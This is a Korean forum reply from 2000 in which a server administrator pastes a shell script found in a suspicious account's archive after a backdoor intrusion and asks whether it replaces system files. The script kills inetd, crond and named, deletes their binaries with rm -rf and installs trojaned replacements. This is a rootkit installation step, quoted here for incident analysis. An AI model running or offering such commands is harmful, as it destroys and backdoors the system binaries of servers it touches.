>> Delete Reply from No. 2439 article
No. RE: 추가확인사항

등록 2000-08-11 17:55:00 By localhost     조회 2
이름 weare    

		위의 화일중의 하나의 스크립트가 이렇게 되어있습니다.....
 echo "killing ervicec.."
killall -9 inetd
killall -9 crond
killall -9 named
echo "removing old files.."
rm -rf /usr/sbin/named
rm -rf /usr/sbin/crond
rm -rf /usr/sbin/in.ftpd
rm -rf /var/named/ADMROCKS
echo "installing new files.."
mv named /usr/sbin/named
mv crond /usr/sbin/crond
mv in.ftpd /usr/sbin/in.ftpd
chmod +x /usr/sbin/named
chmod +x /usr/sbin/crond
chmod +x /usr/sbin/in.ftpd
echo "restarting services.."
/usr/sbin/inetd
/usr/sbin/crond
 위의 스크립트는 위 화일을 바꿔치기 하는 스크립트가 아닌가여??????
 ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.ㅠ.
        
 : 쩝 해킹의 소식이 이렇게 빠르다니..........
:
: 얼마전 백도어 해킹에 서버를 살펴보다보니..............
:
: 이상한 계정자가 생성 되어있구...........  그 계정 디렉토리에
:
: secure.tgz 화일과  login.tgz 화일이 있고
:
: secure.tgz 화일을 풀어보니....  crond 과 in.ftpd , named , 그리고
:
: secure.sh 화일이 있더군여..................
:
: login.tgz 화일은 풀어서 컴파일한 흔적이 있구여..........
:
: 제가 조금전에 링크를 걸어 놨더니 겁나게 많이들 가져 가시더라구여..
:
: 만약 해킹에 이용된 도구라면 또다시 이용될까봐 .....  과감히 삭제하고
:
: 파일도 퍼미션을 바꿔 놨습니다..  좀전가져가신 분들은 파악되시면...
:
: 저에게 메일 부탁드리구여........................  글구 위의 파일에
:
: 대한 정보를 아시는 분이 있으시다면 말씀좀 부탁드립니다...........
:
: 또한 위 쏘스를 분석하실수 있으신 진정한 리눅서 께서는 저에게 멜 주시면
:
: 위의 쏘스를 보내 드리겠습니다.......
[관리자] 패스워드를 입력 하십시오. 답장이 존재하면 함께 삭제됩니다.[ 목록 | 이전 ]
패스워드:    

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved